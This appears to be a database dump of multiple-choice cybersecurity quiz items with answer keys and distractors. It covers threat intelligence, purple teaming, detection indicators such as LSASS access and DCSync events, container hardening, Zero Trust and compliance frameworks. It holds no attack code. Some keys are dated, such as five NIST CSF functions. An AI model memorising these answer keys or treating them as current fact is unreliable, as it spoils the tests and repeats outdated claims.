(6252, 392, 'What is \"Pivoting\" in threat intel?', 3, 'Using one IOC to discover related infrastructure', 0, 'Connect', '2025-12-27 02:21:01', '[\"Turning around\", \"Using one IOC to discover related infrastructure\", \"Deleting IOCs\", \"Renaming IOCs\"]'),
(6253, 393, 'What is the Diamond Model used for?', 1, 'Relating Adversary, Infrastructure, Capability, and Victim', 0, 'Framework', '2025-12-27 02:21:01', '[\"File analysis\", \"Relating Adversary, Infrastructure, Capability, and Victim\", \"Network monitoring\", \"Encryption\"]'),
(6254, 393, 'Why is attribution difficult?', 2, 'False flags, shared tools, proxy infrastructure', 0, 'Challenges', '2025-12-27 02:21:01', '[\"It is easy\", \"False flags, shared tools, proxy infrastructure\", \"Everyone signs their work\", \"Logs are perfect\"]'),
(6255, 393, 'What does \"High Confidence\" attribution mean?', 3, 'Multiple corroborating sources support it', 0, 'Verified', '2025-12-27 02:21:01', '[\"Guessing\", \"Multiple corroborating sources support it\", \"One source\", \"No evidence\"]'),
(6256, 394, 'What is STIX?', 1, 'JSON format for describing threat intelligence', 0, 'Format', '2025-12-27 02:21:01', '[\"A transport protocol\", \"JSON format for describing threat intelligence\", \"A firewall\", \"A SIEM\"]'),
(6257, 394, 'What does TAXII do?', 2, 'Transport STIX-formatted threat intel', 0, 'Transport', '2025-12-27 02:21:01', '[\"Store files\", \"Transport STIX-formatted threat intel\", \"Encrypt data\", \"Delete IOCs\"]'),
(6258, 394, 'What does TLP:RED mean?', 3, 'Not for disclosure outside the recipient', 0, 'Restricted', '2025-12-27 02:21:01', '[\"Public\", \"Not for disclosure outside the recipient\", \"Community share\", \"Partner share\"]'),
(6259, 395, 'Where can you push IOCs for blocking?', 1, 'Firewall, Proxy, EDR, Email Gateway', 0, 'Enforcement', '2025-12-27 02:21:01', '[\"Nowhere\", \"Firewall, Proxy, EDR, Email Gateway\", \"Only SIEM\", \"Only Email\"]'),
(6260, 395, 'What is a TIP?', 2, 'Threat Intelligence Platform', 0, 'Platform', '2025-12-27 02:21:01', '[\"Threat Inspection Protocol\", \"Threat Intelligence Platform\", \"Technical Investigation Process\", \"None\"]'),
(6261, 395, 'Why is a feedback loop important?', 3, 'Intel team learns if IOCs were useful or false positives', 0, 'Improve', '2025-12-27 02:21:01', '[\"It is not\", \"Intel team learns if IOCs were useful or false positives\", \"To delete intel\", \"To create more alerts\"]'),
(6262, 396, 'Who consumes Strategic intel?', 1, 'Executives', 0, 'Leadership', '2025-12-27 02:21:01', '[\"SOC Analysts\", \"Executives\", \"Developers\", \"All\"]'),
(6263, 396, 'What is MISP?', 2, 'Open-source threat intel platform', 0, 'Platform', '2025-12-27 02:21:01', '[\"SIEM\", \"Open-source threat intel platform\", \"Firewall\", \"EDR\"]'),
(6264, 396, 'STIX is a:', 3, 'JSON format for threat intel', 0, 'Format', '2025-12-27 02:21:01', '[\"Transport protocol\", \"JSON format for threat intel\", \"Firewall rule\", \"Log format\"]'),
(6265, 396, 'TAXII is a:', 4, 'Transport protocol for STIX', 0, 'Transport', '2025-12-27 02:21:01', '[\"Data format\", \"Transport protocol for STIX\", \"SIEM\", \"EDR\"]'),
(6266, 396, 'What does TLP:RED mean?', 5, 'Not for disclosure outside recipient', 0, 'Restricted', '2025-12-27 02:21:01', '[\"Public\", \"Not for disclosure outside recipient\", \"Share widely\", \"Community only\"]'),
(6267, 396, 'Where do you push IOCs for enforcement?', 6, 'Firewall, Proxy, EDR', 0, 'Block', '2025-12-27 02:21:01', '[\"Only SIEM\", \"Firewall, Proxy, EDR\", \"Nowhere\", \"Email only\"]'),
(6268, 401, 'What is the Red Team\'s primary role?', 1, 'Offensive - simulate attacks to test defenses', 0, 'Offense', '2025-12-27 02:22:24', '[\"Defensive\", \"Offensive - simulate attacks to test defenses\", \"Compliance\", \"Training\"]'),
(6269, 401, 'What is Purple Teaming?', 2, 'Collaboration between Red and Blue teams', 0, 'Collab', '2025-12-27 02:22:24', '[\"Only offense\", \"Collaboration between Red and Blue teams\", \"Only defense\", \"Management\"]'),
(6270, 401, 'Why does Purple Teaming improve security?', 3, 'Red shares attack methods, Blue improves detection', 0, 'Learn together', '2025-12-27 02:22:24', '[\"It is cheaper\", \"Red shares attack methods, Blue improves detection\", \"More alerts\", \"Less work\"]'),
(6271, 402, 'What is an ROE in Red Team context?', 1, 'Rules of Engagement - defines scope and limits', 0, 'Rules', '2025-12-27 02:22:24', '[\"A tool\", \"Rules of Engagement - defines scope and limits\", \"A C2 framework\", \"A report\"]'),
(6272, 402, 'Which tool is used for AD attack path mapping?', 2, 'BloodHound', 0, 'Graph', '2025-12-27 02:22:24', '[\"Metasploit\", \"BloodHound\", \"Cobalt Strike\", \"Nmap\"]'),
(6273, 402, 'What is post-exploitation?', 3, 'Actions after initial access (persistence, lateral movement)', 0, 'After', '2025-12-27 02:22:24', '[\"Before hacking\", \"Actions after initial access (persistence, lateral movement)\", \"Cleanup\", \"Reporting\"]'),
(6274, 403, 'What does NDR focus on?', 1, 'Network Detection and Response', 0, 'Network', '2025-12-27 02:22:24', '[\"Endpoints\", \"Network Detection and Response\", \"Email\", \"Cloud\"]'),
(6275, 403, 'What is a honeytoken?', 2, 'Fake credential or data designed to alert on access', 0, 'Trap', '2025-12-27 02:22:24', '[\"Real password\", \"Fake credential or data designed to alert on access\", \"A log file\", \"A backup\"]'),
(6276, 403, 'How does Blue Team use MITRE ATT&CK?', 3, 'Map detection coverage and identify gaps', 0, 'Coverage', '2025-12-27 02:22:24', '[\"Attack systems\", \"Map detection coverage and identify gaps\", \"Delete logs\", \"Train users\"]'),
(6277, 404, 'What is an Atomic Test?', 1, 'Single technique execution with immediate validation', 0, 'Small test', '2025-12-27 02:22:24', '[\"Full attack simulation\", \"Single technique execution with immediate validation\", \"Discussion only\", \"Report writing\"]'),
(6278, 404, 'During Purple Team, what happens if Blue fails to detect?', 2, 'Create new detection rule or tune existing', 0, 'Improve', '2025-12-27 02:22:24', '[\"Blame Red\", \"Create new detection rule or tune existing\", \"Ignore it\", \"Delete logs\"]'),
(6279, 404, 'Why is real-time communication important in Purple Team?', 3, 'Blue can correlate activity in real-time', 0, 'Immediate', '2025-12-27 02:22:24', '[\"It is not\", \"Blue can correlate activity in real-time\", \"For fun\", \"To delay\"]'),
(6280, 405, 'What is the difference between pen testing and adversary emulation?', 1, 'Adversary emulation replicates specific threat actor TTPs', 0, 'Realistic', '2025-12-27 02:22:24', '[\"No difference\", \"Adversary emulation replicates specific threat actor TTPs\", \"Pen testing is better\", \"Emulation is cheaper\"]'),
(6281, 405, 'Which framework automates adversary emulation?', 2, 'MITRE Caldera', 0, 'Automated', '2025-12-27 02:22:24', '[\"Metasploit\", \"MITRE Caldera\", \"Wireshark\", \"Splunk\"]'),
(6282, 405, 'Why emulate a specific APT group?', 3, 'Test defenses against adversaries likely to target you', 0, 'Relevance', '2025-12-27 02:22:24', '[\"For fun\", \"Test defenses against adversaries likely to target you\", \"It is required\", \"To impress management\"]'),
(6283, 406, 'What is the Red Team\'s goal?', 1, 'Test defenses by simulating attacks', 0, 'Offense', '2025-12-27 02:22:24', '[\"Build tools\", \"Test defenses by simulating attacks\", \"Write reports\", \"Train users\"]'),
(6284, 406, 'What is Purple Teaming?', 2, 'Collaboration between Red and Blue', 0, 'Together', '2025-12-27 02:22:24', '[\"Only offense\", \"Collaboration between Red and Blue\", \"Only defense\", \"Compliance\"]'),
(6285, 406, 'Which tool extracts Windows credentials?', 3, 'Mimikatz', 0, 'Creds', '2025-12-27 02:22:24', '[\"BloodHound\", \"Mimikatz\", \"Cobalt Strike\", \"Nmap\"]'),
(6286, 406, 'What is a honeytoken?', 4, 'Fake data that alerts when accessed', 0, 'Trap', '2025-12-27 02:22:24', '[\"Password\", \"Fake data that alerts when accessed\", \"Log file\", \"Backup\"]'),
(6287, 406, 'What framework automates adversary emulation?', 5, 'MITRE Caldera', 0, 'Automation', '2025-12-27 02:22:24', '[\"Metasploit\", \"MITRE Caldera\", \"Wireshark\", \"Burp\"]'),
(6288, 406, 'What happens after Blue fails to detect in Purple Team?', 6, 'Create or improve detection rules', 0, 'Improve', '2025-12-27 02:22:24', '[\"Blame Red\", \"Create or improve detection rules\", \"Ignore it\", \"Fire someone\"]'),
(6289, 411, 'Why establish a baseline before exercises?', 1, 'To distinguish attack activity from normal behavior', 0, 'Compare', '2025-12-27 02:26:00', '[\"It is required by law\", \"To distinguish attack activity from normal behavior\", \"To slow things down\", \"No reason\"]'),
(6290, 411, 'What should be documented for each exercise?', 2, 'Technique, execution steps, expected detection, results', 0, 'Everything', '2025-12-27 02:26:00', '[\"Nothing\", \"Technique, execution steps, expected detection, results\", \"Only failures\", \"Only successes\"]'),
(6291, 411, 'Which tool provides a library of technique tests?', 3, 'Atomic Red Team', 0, 'Library', '2025-12-27 02:26:00', '[\"Splunk\", \"Atomic Red Team\", \"Wireshark\", \"Nmap\"]'),
(6292, 412, 'Which Sysmon Event ID indicates process access to LSASS?', 1, 'Event ID 10', 0, 'Access', '2025-12-27 02:26:00', '[\"Event ID 1\", \"Event ID 10\", \"Event ID 11\", \"Event ID 22\"]'),
(6293, 412, 'What is DCSync?', 2, 'Replicating AD credentials by impersonating a domain controller', 0, 'Replication', '2025-12-27 02:26:00', '[\"Syncing files\", \"Replicating AD credentials by impersonating a domain controller\", \"Backing up\", \"Logging\"]'),
(6294, 412, 'Which Windows event logs DCSync activity?', 3, 'Security Event 4662 (replication rights)', 0, 'AD', '2025-12-27 02:26:00', '[\"Sysmon 1\", \"Security Event 4662 (replication rights)\", \"Application log\", \"System log\"]'),
(6295, 413, 'What does PsExec create on the remote host?', 1, 'A service (PSEXESVC)', 0, 'Service', '2025-12-27 02:26:00', '[\"A file only\", \"A service (PSEXESVC)\", \"Nothing\", \"A registry key\"]'),
(6296, 413, 'Which parent-child relationship is suspicious for WMI?', 2, 'WmiPrvSE.exe spawning cmd.exe or powershell.exe', 0, 'Process tree', '2025-12-27 02:26:00', '[\"svchost → notepad\", \"WmiPrvSE.exe spawning cmd.exe or powershell.exe\", \"explorer → chrome\", \"lsass → svchost\"]'),
(6297, 413, 'Windows Event 7045 indicates:', 3, 'A new service was installed', 0, 'Service', '2025-12-27 02:26:00', '[\"Login\", \"A new service was installed\", \"File access\", \"Network connection\"]'),
(6298, 414, 'What indicates DNS tunneling?', 1, 'High query volume, unusually long subdomains', 0, 'DNS', '2025-12-27 02:26:00', '[\"Slow DNS\", \"High query volume, unusually long subdomains\", \"No DNS\", \"Fast DNS\"]'),
(6299, 414, 'Why monitor uploads to cloud storage domains?', 2, 'Attackers exfiltrate to Dropbox, Google Drive, etc.', 0, 'Cloud exfil', '2025-12-27 02:26:00', '[\"It is slow\", \"Attackers exfiltrate to Dropbox, Google Drive, etc.\", \"Cloud is unsafe\", \"For compliance\"]'),
(6300, 414, 'Which HTTP method is commonly used for exfiltration?', 3, 'POST', 0, 'Upload', '2025-12-27 02:26:00', '[\"GET\", \"POST\", \"DELETE\", \"HEAD\"]'),
(6301, 415, 'What does Detection Rate measure?', 1, 'Percentage of executed techniques that were detected', 0, 'Success', '2025-12-27 02:26:00', '[\"Speed\", \"Percentage of executed techniques that were detected\", \"Cost\", \"Size\"]'),
(6302, 415, 'Why use ATT&CK Navigator heatmaps?', 2, 'Visualize detection coverage across techniques', 0, 'Visualization', '2025-12-27 02:26:00', '[\"It is pretty\", \"Visualize detection coverage across techniques\", \"Required by law\", \"For fun\"]'),
(6303, 415, 'How often should Purple Team exercises occur?', 3, 'Regularly (monthly or quarterly)', 0, 'Recurring', '2025-12-27 02:26:00', '[\"Once ever\", \"Regularly (monthly or quarterly)\", \"Never\", \"Only after breaches\"]'),
(6304, 416, 'Which Sysmon event indicates process access to LSASS?', 1, 'Event ID 10', 0, 'Credential', '2025-12-27 02:26:00', '[\"1\", \"Event ID 10\", \"Event ID 11 \", \"Event ID 22\"]'),
(6305, 416, 'PsExec creates what on remote hosts?', 2, 'A service (PSEXESVC)', 0, 'Remote', '2025-12-27 02:26:00', '[\"A file\", \"A service (PSEXESVC)\", \"Nothing\", \"A user\"]'),
(6306, 416, 'DNS tunneling is characterized by:', 3, 'Long subdomains, high query volume', 0, 'DNS', '2025-12-27 02:26:00', '[\"Fast lookups\", \"Long subdomains, high query volume\", \"No queries\", \"Short names\"]'),
(6307, 416, 'Detection Rate formula:', 4, '(Detected / Executed) x 100', 0, 'Metric', '2025-12-27 02:26:00', '[\"Executed / Detected\", \"(Detected / Executed) x 100\", \"Random\", \"None\"]'),
(6308, 416, 'What should happen after deploying new detection?', 5, 'Re-test the technique', 0, 'Validate', '2025-12-27 02:26:00', '[\"Nothing\", \"Re-test the technique\", \"Delete old alerts\", \"Wait\"]'),
(6309, 416, 'What is Time to Detect (TTD)?', 6, 'Time between execution and alert', 0, 'Speed', '2025-12-27 02:26:00', '[\"Time to delete\", \"Time between execution and alert\", \"Time to report\", \"Time to lunch\"]'),
(6310, 421, 'How does container isolation differ from VMs?', 1, 'Containers share the host kernel; VMs have full kernel isolation', 0, 'Kernel', '2025-12-27 02:27:22', '[\"No difference\", \"Containers share the host kernel; VMs have full kernel isolation\", \"VMs are less secure\", \"Containers are slower\"]'),
(6311, 421, 'What is the risk of container escape?', 2, 'Attacker gains access to the host and other containers', 0, 'Host', '2025-12-27 02:27:22', '[\"Nothing\", \"Attacker gains access to the host and other containers\", \"Container restarts\", \"Performance drop\"]'),
(6312, 421, 'What standard provides Kubernetes hardening guidance?', 3, 'CIS Kubernetes Benchmark', 0, 'CIS', '2025-12-27 02:27:22', '[\"ISO 27001\", \"CIS Kubernetes Benchmark\", \"PCI DSS\", \"HIPAA\"]'),
(6313, 422, 'Why avoid --privileged flag?', 1, 'It gives the container full host capabilities', 0, 'Root', '2025-12-27 02:27:22', '[\"It is slow\", \"It gives the container full host capabilities\", \"It uses more memory\", \"No reason\"]'),
(6314, 422, 'What does --cap-drop=ALL do?', 2, 'Removes all Linux capabilities from the container', 0, 'Least privilege', '2025-12-27 02:27:22', '[\"Adds capabilities\", \"Removes all Linux capabilities from the container\", \"Drops the container\", \"Deletes files\"]'),
(6315, 422, 'Which tool audits Docker against CIS Benchmark?', 3, 'Docker Bench Security', 0, 'Audit', '2025-12-27 02:27:22', '[\"Nmap\", \"Docker Bench Security\", \"Wireshark\", \"Burp Suite\"]'),
(6316, 423, 'What does RBAC control in Kubernetes?', 1, 'Who can do what to which resources', 0, 'Access', '2025-12-27 02:27:22', '[\"Network traffic\", \"Who can do what to which resources\", \"Storage\", \"Logging\"]'),
(6317, 423, 'What is the most restrictive Pod Security Standard?', 2, 'Restricted', 0, 'Strict', '2025-12-27 02:27:22', '[\"Privileged\", \"Baseline\", \"Restricted\", \"None\"]'),
(6318, 423, 'Why use NetworkPolicy?', 3, 'Restrict pod-to-pod communication', 0, 'Segmentation', '2025-12-27 02:27:22', '[\"Faster network\", \"Restrict pod-to-pod communication\", \"More pods\", \"Easier config\"]'),
(6319, 424, 'Which tool scans container images for CVEs?', 1, 'Trivy', 0, 'Scanner', '2025-12-27 02:27:22', '[\"Nmap\", \"Trivy\", \"Wireshark\", \"Metasploit\"]'),
(6320, 424, 'What is Distroless?', 2, 'Container images with no shell or package manager', 0, 'Minimal', '2025-12-27 02:27:22', '[\"A Linux distro\", \"Container images with no shell or package manager\", \"A Docker command\", \"A network tool\"]'),
(6321, 424, 'Why sign container images?', 3, 'Verify provenance and prevent tampering', 0, 'Trust', '2025-12-27 02:27:22', '[\"Faster pulls\", \"Verify provenance and prevent tampering\", \"Smaller size\", \"No reason\"]'),
(6322, 425, 'What does Falco monitor?', 1, 'System calls (syscalls) at runtime', 0, 'Syscall', '2025-12-27 02:27:22', '[\"Network only\", \"System calls (syscalls) at runtime\", \"Files only\", \"Nothing\"]'),
(6323, 425, 'What is a behavioral baseline?', 2, 'Profile of normal container behavior to detect anomalies', 0, 'Normal', '2025-12-27 02:27:22', '[\"A security tool\", \"Profile of normal container behavior to detect anomalies\", \"A network policy\", \"A log file\"]'),
(6324, 425, 'What action can runtime security take on a threat?', 3, 'Kill, pause, or alert on the container', 0, 'Response', '2025-12-27 02:27:22', '[\"Nothing\", \"Kill, pause, or alert on the container\", \"Only log\", \"Restart host\"]'),
(6325, 426, 'Containers share what with the host?', 1, 'The kernel', 0, 'Shared', '2025-12-27 02:27:22', '[\"Nothing\", \"The kernel\", \"The filesystem only\", \"Memory only\"]'),
(6326, 426, 'What does --cap-drop=ALL do?', 2, 'Removes all Linux capabilities', 0, 'Restrict', '2025-12-27 02:27:22', '[\"Adds capabilities\", \"Removes all Linux capabilities\", \"Drops container\", \"Nothing\"]'),
(6327, 426, 'Which tool scans images for CVEs?', 3, 'Trivy', 0, 'Scanner', '2025-12-27 02:27:22', '[\"Nmap\", \"Trivy\", \"Docker\", \"Kubernetes\"]'),
(6328, 426, 'What does RBAC control?', 4, 'Who can access which resources', 0, 'Access', '2025-12-27 02:27:22', '[\"Network\", \"Who can access which resources\", \"Storage\", \"CPU\"]'),
(6329, 426, 'What does Falco monitor?', 5, 'System calls at runtime', 0, 'Runtime', '2025-12-27 02:27:22', '[\"Images\", \"System calls at runtime\", \"Network only\", \"Logs\"]'),
(6330, 426, 'Why use minimal base images?', 6, 'Fewer vulnerabilities, smaller attack surface', 0, 'Less CVEs', '2025-12-27 02:27:22', '[\"Faster\", \"Fewer vulnerabilities, smaller attack surface\", \"Prettier\", \"Cheaper\"]'),
(6331, 431, 'What is the Zero Trust motto?', 1, 'Never trust, always verify', 0, 'Motto', '2025-12-27 02:28:42', '[\"Trust everyone\", \"Never trust, always verify\", \"Trust but verify\", \"Always trust\"]'),
(6332, 431, 'What does \"Assume Breach\" mean?', 2, 'Design security as if attackers are already inside', 0, 'Mindset', '2025-12-27 02:28:42', '[\"Panic\", \"Design security as if attackers are already inside\", \"Give up\", \"Trust more\"]'),
(6333, 431, 'Which NIST document defines Zero Trust Architecture?', 3, 'SP 800-207', 0, 'Standard', '2025-12-27 02:28:42', '[\"SP 800-53\", \"SP 800-207\", \"SP 800-171\", \"SP 800-61\"]'),
(6334, 432, 'In Zero Trust, what replaces network location as the trust boundary?', 1, 'Identity', 0, 'Who', '2025-12-27 02:28:42', '[\"Firewall\", \"Identity\", \"IP address\", \"VPN\"]'),
(6335, 432, 'What is phishing-resistant MFA?', 2, 'FIDO2/WebAuthn hardware keys', 0, 'Strong', '2025-12-27 02:28:42', '[\"SMS codes\", \"FIDO2/WebAuthn hardware keys\", \"Email codes\", \"Security questions\"]'),
(6336, 432, 'Conditional Access decisions are based on:', 3, 'User, device, location, and application risk signals', 0, 'Signals', '2025-12-27 02:28:42', '[\"Random\", \"User, device, location, and application risk signals\", \"Time only\", \"IP only\"]'),
(6337, 433, 'What does microsegmentation prevent?', 1, 'Lateral movement after initial compromise', 0, 'Contain', '2025-12-27 02:28:42', '[\"Authentication\", \"Lateral movement after initial compromise\", \"Logging\", \"Faster network\"]'),
(6338, 433, 'What does ZTNA replace?', 2, 'Traditional VPN', 0, 'VPN', '2025-12-27 02:28:42', '[\"Firewall\", \"Traditional VPN\", \"SIEM\", \"EDR\"]'),
(6339, 433, 'Microsegmentation uses what type of traffic rules?', 3, 'Identity/context-based, not just IP', 0, 'Context', '2025-12-27 02:28:42', '[\"IP only\", \"Identity/context-based, not just IP\", \"Random\", \"None\"]'),
(6340, 434, 'What is continuous verification?', 1, 'Evaluating trust throughout the session, not just at login', 0, 'Ongoing', '2025-12-27 02:28:42', '[\"One-time check\", \"Evaluating trust throughout the session, not just at login\", \"Weekly audit\", \"Never check\"]'),
(6341, 434, 'What is a step-up authentication?', 2, 'Requiring additional verification when risk increases', 0, 'More MFA', '2025-12-27 02:28:42', '[\"Login\", \"Requiring additional verification when risk increases\", \"Password reset\", \"Logout\"]'),
(6342, 434, 'UEBA provides:', 3, 'User and entity behavior analytics', 0, 'Behavior', '2025-12-27 02:28:42', '[\"Firewall rules\", \"User and entity behavior analytics\", \"Encryption\", \"Backups\"]'),
(6343, 435, 'What is the first step in Zero Trust implementation?', 1, 'Identify users, devices, applications, and data', 0, 'Discovery', '2025-12-27 02:28:42', '[\"Deploy firewall\", \"Identify users, devices, applications, and data\", \"Buy tools\", \"Hire staff\"]'),
(6344, 435, 'What are \"Quick Wins\" for Zero Trust?', 2, 'MFA everywhere, conditional access, EDR', 0, 'Easy', '2025-12-27 02:28:42', '[\"Nothing\", \"MFA everywhere, conditional access, EDR\", \"Complete overhaul\", \"Do nothing\"]'),
(6345, 435, 'What should you protect first?', 3, 'Crown jewels (most critical assets)', 0, 'Priority', '2025-12-27 02:28:42', '[\"Everything equally\", \"Crown jewels (most critical assets)\", \"Nothing\", \"Random\"]'),
(6346, 436, 'Zero Trust motto is:', 1, 'Never trust, always verify', 0, 'Motto', '2025-12-27 02:28:42', '[\"Always trust\", \"Never trust, always verify\", \"Trust everyone\", \"Trust but verify\"]'),
(6347, 436, 'In Zero Trust, what is the new perimeter?', 2, 'Identity', 0, 'Boundary', '2025-12-27 02:28:42', '[\"Firewall\", \"Identity\", \"VPN\", \"Router\"]'),
(6348, 436, 'ZTNA replaces:', 3, 'Traditional VPN', 0, 'Access', '2025-12-27 02:28:42', '[\"SIEM\", \"Traditional VPN\", \"EDR\", \"Antivirus\"]'),
(6349, 436, 'Microsegmentation prevents:', 4, 'Lateral movement', 0, 'Contain', '2025-12-27 02:28:42', '[\"Authentication\", \"Lateral movement\", \"Logging\", \"Backup\"]'),
(6350, 436, 'Continuous verification means:', 5, 'Trust is evaluated throughout the session', 0, 'Ongoing', '2025-12-27 02:28:42', '[\"One check\", \"Trust is evaluated throughout the session\", \"Never check\", \"Weekly\"]'),
(6351, 436, 'First step in ZT implementation:', 6, 'Identify users, devices, apps, data', 0, 'Discovery', '2025-12-27 02:28:42', '[\"Buy tools\", \"Identify users, devices, apps, data\", \"Hire\", \"Nothing\"]'),
(6352, 441, 'What is the difference between a framework and compliance?', 1, 'Framework is guidance; compliance is mandatory requirements', 0, 'Difference', '2025-12-27 02:30:07', '[\"Same thing\", \"Framework is guidance; compliance is mandatory requirements\", \"Compliance is optional\", \"Framework is mandatory\"]'),
(6353, 441, 'Why do organizations adopt security frameworks?', 2, 'Common language, best practices, risk management', 0, 'Benefits', '2025-12-27 02:30:07', '[\"For fun\", \"Common language, best practices, risk management\", \"To slow things down\", \"No reason\"]'),
(6354, 441, 'What is an audit?', 3, 'Verification that requirements are met', 0, 'Check', '2025-12-27 02:30:07', '[\"Sales pitch\", \"Verification that requirements are met\", \"Training\", \"Party\"]'),
(6355, 442, 'How many core functions are in NIST CSF?', 1, '5 (Identify, Protect, Detect, Respond, Recover)', 0, 'Five', '2025-12-27 02:30:07', '[\"3\", \"5 (Identify, Protect, Detect, Respond, Recover)\", \"7\", \"10\"]'),
(6356, 442, 'What is a \"Profile\" in NIST CSF?', 2, 'Current or target state of cybersecurity posture', 0, 'State', '2025-12-27 02:30:07', '[\"A social media page\", \"Current or target state of cybersecurity posture\", \"A firewall rule\", \"A user account\"]'),
(6357, 442, 'Which tier represents continuous improvement?', 3, 'Tier 4 - Adaptive', 0, 'Best', '2025-12-27 02:30:07', '[\"Tier 1\", \"Tier 2\", \"Tier 3\", \"Tier 4 - Adaptive\"]'),
(6358, 443, 'What does ISMS stand for?', 1, 'Information Security Management System', 0, 'ISMS', '2025-12-27 02:30:07', '[\"Internal Security Monitoring System\", \"Information Security Management System\", \"Internet Security Module Standard\", \"None\"]'),
(6359, 443, 'How long is ISO 27001 certification valid?', 2, '3 years with annual surveillance audits', 0, 'Three', '2025-12-27 02:30:07', '[\"Forever\", \"3 years with annual surveillance audits\", \"1 year\", \"Monthly\"]'),
(6360, 443, 'What is the purpose of ISO 27002?', 3, 'Guidance on implementing ISO 27001 controls', 0, 'How-to', '2025-12-27 02:30:07', '[\"Certification\", \"Guidance on implementing ISO 27001 controls\", \"Auditing\", \"Pricing\"]'),
(6361, 444, 'Which SOC 2 criterion is always required?', 1, 'Security', 0, 'Core', '2025-12-27 02:30:07', '[\"Availability\", \"Privacy\", \"Security\", \"Integrity\"]'),
(6362, 444, 'What is the difference between SOC 2 Type I and Type II?', 2, 'Type I is point-in-time; Type II tests over a period', 0, 'Duration', '2025-12-27 02:30:07', '[\"Same thing\", \"Type I is point-in-time; Type II tests over a period\", \"Type II is faster\", \"Type I is better\"]'),
(6363, 444, 'Who performs SOC 2 audits?', 3, 'CPA firm (independent auditors)', 0, 'Auditor', '2025-12-27 02:30:07', '[\"Internal team\", \"CPA firm (independent auditors)\", \"Customers\", \"Anyone\"]'),
(6364, 445, 'How many requirements does PCI-DSS have?', 1, '12', 0, 'Twelve', '2025-12-27 02:30:07', '[\"5\", \"10\", \"12\", \"20\"]'),
(6365, 445, 'What does HIPAA protect?', 2, 'PHI (Protected Health Information)', 0, 'Health', '2025-12-27 02:30:07', '[\"Credit cards\", \"PHI (Protected Health Information)\", \"IP addresses\", \"Passwords\"]'),
(6366, 445, 'What is the HIPAA Breach Notification Rule?', 3, 'Report breaches within 60 days', 0, 'Notify', '2025-12-27 02:30:07', '[\"Delete data\", \"Report breaches within 60 days\", \"Hide breach\", \"Nothing\"]'),
(6367, 446, 'NIST CSF has how many core functions?', 1, '5', 0, 'Functions', '2025-12-27 02:30:07', '[\"3\", \"5\", \"7\", \"10\"]'),
(6368, 446, 'ISO 27001 certification lasts:', 2, '3 years', 0, 'Duration', '2025-12-27 02:30:07', '[\"Forever\", \"1 year\", \"3 years\", \"5 years\"]'),
(6369, 446, 'Which SOC 2 criterion is mandatory?', 3, 'Security', 0, 'Required', '2025-12-27 02:30:07', '[\"Privacy\", \"Availability\", \"Security\", \"Integrity\"]'),
(6370, 446, 'PCI-DSS has how many requirements?', 4, '12', 0, 'Count', '2025-12-27 02:30:07', '[\"5\", \"10\", \"12\", \"15\"]'),
(6371, 446, 'HIPAA protects:', 5, 'Protected Health Information (PHI)', 0, 'Health', '2025-12-27 02:30:07', '[\"Credit cards\", \"Protected Health Information (PHI)\", \"Passwords\", \"IP addresses\"]'),
(6372, 446, 'SOC 2 Type II tests controls over:', 6, 'A period of time (6-12 months)', 0, 'Duration', '2025-12-27 02:30:07', '[\"One day\", \"A period of time (6-12 months)\", \"One hour\", \"Never\"]'),
(6976, 765, 'What transforms \"Data\" into \"Intelligence\"?', 1, 'Analysis and Context', 0, 'Data needs processing and analysis to become useful.', '2025-12-29 13:30:44', '[\"Storage\", \"Encryption\", \"Analysis and Context\", \"Transmission\"]'),
(6977, 765, 'Which is an example of \"Intelligence\"?', 2, 'A report advising to block an IP due to active ransomware targeting your industry', 0, 'Intelligence is actionable and relevant.', '2025-12-29 13:30:44', '[\"A log file\", \"A list of IP addresses\", \"A report advising to block an IP due to active ransomware targeting your industry\", \"A spreadsheet of users\"]'),
(6978, 765, 'What is the primary goal of CTI?', 3, 'To support decision making', 0, 'CTI gives stakeholders the info they need to decide.', '2025-12-29 13:30:44', '[\"To hack back\", \"To support decision making\", \"To replace firewalls\", \"To find software bugs\"]'),
(6979, 766, 'Which phase involves setting the goals and requirements?', 1, 'Direction', 0, 'Also called Planning & Direction.', '2025-12-29 13:30:45', '[\"Collection\", \"Direction\", \"Analysis\", \"Feedback\"]'),
(6980, 766, 'Translating a document from Russian to English happens in which phase?', 2, 'Processing', 0, 'Processing converts raw data into a usable format.', '2025-12-29 13:30:45', '[\"Processing\", \"Analysis\", \"Collection\", \"Dissemination\"]'),
(6981, 766, 'Why is Feedback important?', 3, 'It improves future intelligence cycles', 0, 'Feedback ensures the intel met the needs of the consumer.', '2025-12-29 13:30:45', '[\"It saves money\", \"It improves future intelligence cycles\", \"It is required by law\", \"It deletes old data\"]'),
(6982, 767, 'Who is the primary audience for Strategic Intelligence?', 1, 'Executives / CISO', 0, 'High-level decision makers.', '2025-12-29 13:30:45', '[\"SOC Analyst\", \"Penetration Tester\", \"Executives / CISO\", \"Firewall Administrator\"]'),
(6983, 767, 'A list of malicious IP addresses is what type of intelligence?', 2, 'Tactical', 0, 'Tactical intel is used for immediate blocking/detection (IOCs).', '2025-12-29 13:30:45', '[\"Strategic\", \"Operational\", \"Tactical\", \"Technical\"]'),
(6984, 767, 'Information about an adversary\'s habits (TTPs) is...', 3, 'Operational', 0, 'Operational intel explains \"How\" the adversary operates.', '2025-12-29 13:30:45', '[\"Operational\", \"Strategic\", \"Tactical\", \"None\"]'),
(6985, 768, 'What is the \"Pyramid of Value\" order from bottom to top?', 1, 'Data > Information > Intelligence', 0, 'Raw Data -> Processed Info -> Actionable Intel.', '2025-12-29 13:30:45', '[\"Intelligence > Information > Data\", \"Data > Information > Intelligence\", \"Data > Intelligence > Information\", \"None\"]'),
(6986, 768, 'Which phase comes AFTER Collection?', 2, 'Processing', 0, 'After collecting raw data, you must process it.', '2025-12-29 13:30:45', '[\"Direction\", \"Analysis\", \"Processing\", \"Dissemination\"]'),
(6987, 768, 'Tactical Intelligence is best consumed by...', 3, 'Automated Systems / SOC Analysts', 0, 'Machines (SIEM) need lists of IPs/Hashes.', '2025-12-29 13:30:45', '[\"Board of Directors\", \"Automated Systems / SOC Analysts\", \"HR Department\", \"Legal Team\"]'),
(6988, 768, 'Strategic Intelligence focuses on...', 4, 'Long-term risk and trends', 0, 'Big picture for executives.', '2025-12-29 13:30:45', '[\"Long-term risk and trends\", \"Daily alerts\", \"Malware reverse engineering\", \"Network packets\"]'),
(6989, 768, 'What does \"TTP\" stand for?', 5, 'Tactics, Techniques, and Procedures', 0, 'TTPs describe adversary behavior.', '2025-12-29 13:30:45', '[\"Tactics, Techniques, and Procedures\", \"Time To Patch\", \"Threat Tech Protocol\", \"Total Threat Protection\"]'),
